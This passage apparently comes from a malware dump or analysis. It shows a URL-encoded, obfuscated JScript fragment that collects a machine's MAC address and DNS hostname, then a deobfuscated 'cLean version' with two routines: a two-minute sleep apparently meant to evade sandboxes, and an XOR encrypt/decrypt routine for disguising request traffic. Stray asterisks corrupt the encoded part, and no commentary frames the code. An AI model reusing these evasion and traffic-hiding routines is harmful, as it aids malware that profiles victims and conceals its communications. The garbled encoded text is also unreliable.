ess%3B%0D%0A%09%09%09dns%5Fhostname%20%3D%20lItems%2Eitem%28%29%2EDNSHostName%3B%0D%0A%09%09%09if%28typeof%20mac%5Faddr*ess%20%3D%3D%3D%20%22string%22%2*0%26%26%20mac%5Faddress%2Elength%20%3E%20%31%29%20%7B%0D%0A%09%09%09%09if%28type*of%20dns%5Fhostname%2

			`// cLean version`
			`function func_start_delay() {`
			`var s_WScript = WScript;`
			`s_WScript.Sleep(120000);`
			`}`

			`function func_crypt_controller(var_type, var_request) {`
			`try {`
			`var encryption_key = "";`
			`if (var_type === "decrypt") {`
			`var_request = unescape(var_request);`
			`var request_split = var_request.split("&_&");`
			`var_request = request_split[0];`
			`if (request_split.length == 2) { encryption_key = request_split[1].split(""); } else { return var_request; }`
			`} else {`
			`encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split("");`
			`var_request = unescape(encodeURIComponent(var_request));`
			`}`
			`var var_output = new Array(var_request.length);`
			`for (var i_counter = 0; i_counter < var_request.length; i_counter++) {`
			`var var_charCode = var_request.charCodeAt(i_counter) ^ encryption_key[i_counter % encryption_key.length].charCodeAt(0);`
			`var_output[i_counter] = String.fromCharCode(var_charCode);`
			`}`
			`var result_string = var_output.join("");`
			`if (var_type === "encrypt") {`
			`result_string = result_string + "&_&" + encryption_key.join("");`
			`result_string = escape(result_string);`
			`}`
			`return result_string;`
			`} catch (e) { return "no"; }`
			`}`